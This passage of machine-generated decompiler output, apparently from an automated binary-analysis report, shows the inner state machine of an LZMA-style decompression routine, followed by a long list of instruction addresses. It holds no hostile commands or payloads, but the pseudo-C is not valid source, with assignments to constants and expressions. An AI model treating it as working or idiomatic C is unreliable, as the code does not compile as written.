											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406d0f
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d15
0x00406d19
0x00406d1d
0x00406d27
0x00406d35
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00407042
0x00407042
0x00407046
0x00000000
0x00000000
0x00407048
0x00407051
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407069
0x00407082
0x00407085
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x0040707a
0x0040707d
0x0040707d
0x0040709f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407046
0x00000000
0x00000000
0x00000000
0x004070a1
0x004070a1
0x0040701a
0x0040701e
0x00407156
0x00407156
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00407024
0x0040702a
0x00407031
0x00407039
0x00407039
0x0040703c
0x00000000
0x0040703c
0x004070a6
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x0040676d
0x00000000
0x00406774
0x00406778
0x00000000
0x00000000
0x0040677e
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067d9
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x004070c9
0x00000000
0x004070c9
0x00406823
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x0040684d
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x004070d8
0x00000000
0x004070d8
0x00406893
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x0040714a
0x00000000
0x0040714a
0x00406fa1
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x00000000
0x00000000
0x004068da
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00000000
0x00406967
0x004068e1
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00000000
0x00000000
0x00406be3
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00000000
0x00000000
0x00406c26
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00406ca2
0x00406ca2
0x00406ca5
0x00406ca8
0x00406cb2
0x00000000
0x00406cb2
0x00406c9d
0x00406c9d
0x00000000
0x00000000
0x00406cbe
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
